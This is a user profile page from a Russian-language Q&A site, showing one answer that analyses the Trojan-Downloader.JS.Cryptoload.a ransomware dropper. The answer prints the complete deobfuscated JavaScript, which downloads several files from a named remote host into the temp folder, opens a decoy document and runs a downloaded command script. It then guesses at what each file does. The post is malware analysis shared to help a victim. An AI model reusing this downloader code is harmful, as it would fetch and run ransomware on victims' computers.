Задать вопрос

sumatorhak

Информация
Пользователь пока ничего не рассказал о себе

Наибольший вклад в теги

Все теги (1)

Лучшие ответы пользователя

Все ответы (1)

  • Вирус Trojan-Downloader.JS.Cryptoload.a, помщь в расшифровке?

    @sumatorhak
    Привет! У меня тоже типа того на работе словили, расшифровал обфусцированный JS в итоге ясны источники откуда все скачалось и что запускалось далее, вот реальный код JS:

    function walkman(t,e){
	var c=new ActiveXObject("MSXML2.XMLHTTP");
	c.onreadystatechange = function(){
		if(4 === c.readyState){
			var t = new ActiveXObject("ADODB.Stream");
			
			t.open(),
			t.type=1,
			t.write(c.ResponseBody),
			t.position=0,
			t.saveToFile(e,2),
	t.close()
		}
	},
	c.open("GET", t, 0),
	c.send()
}

function CreateObject(t){
	return new ActiveXObject(t)
}

var sunshine="attach",
	costarica="%TEMP%\\",
	gti="twitterkeybtc.com",
	mercedes="%TEMP%\\syntax.cmd",
	WshShell=WScript.CreateObject("WScript.Shell"),
	proud="%TEMP%\\document.doc",
	WshShell=CreateObject("WScript.Shell");
	
costarica=WshShell.ExpandEnvironmentStrings(costarica),
walkman("http://"+gti+"/attach/doc.keybtc",""+costarica+"document.doc");

try {
	WshShell.Run(""+proud,1,0)
} catch(cont){}

walkman("http://"+gti+"/attach/night.keybtc",""+costarica+"night.keybtc"),
walkman("http://"+gti+"/attach/fake.keybtc",""+costarica+"fake.keybtc"),
walkman("http://"+gti+"/attach/trash.keybtc",""+costarica+"trash.keybtc"),
walkman("http://"+gti+"/attach/key.block",""+costarica+"syntax.cmd"),
WshShell.Run(""+mercedes,0,0);


    В итоге скрипт выполнится лишь в том случае, если доступен WScript объект и скачает несколько файлов:

    1. twitterkeybtc.com/attach/doc.keybtc (содержит какие то иероглифы, макросов не обнаружил)
    2. twitterkeybtc.com/attach/night.keybtc ( НОЧЬ ; ) )
    3. twitterkeybtc.com/attach/fake.keybtc (очень похоже на утилитку для RSA-1024 шифрования, не получилось запустить из-за отсутствующей iconv.dll (для преобразования кодировки символов), а потом желание запускать отпало =))
    4. twitterkeybtc.com/attach/trash.keybtc (трэш)
    5. twitterkeybtc.com/attach/key.block (а это то, что переименовывается в syntax.cmd и запускается. Скорее всего опять обфусцированно, т.к. содержит иероглифы, хотя странно, переводя их в гугле иногда даже есть смысл (наверное перетрудился=) ) )

    Пока что все, но по предварительным результатам анализа вируса, расшифровать его будет вряд ли возможным...
    Ответ написан
    Комментировать
    Комментировать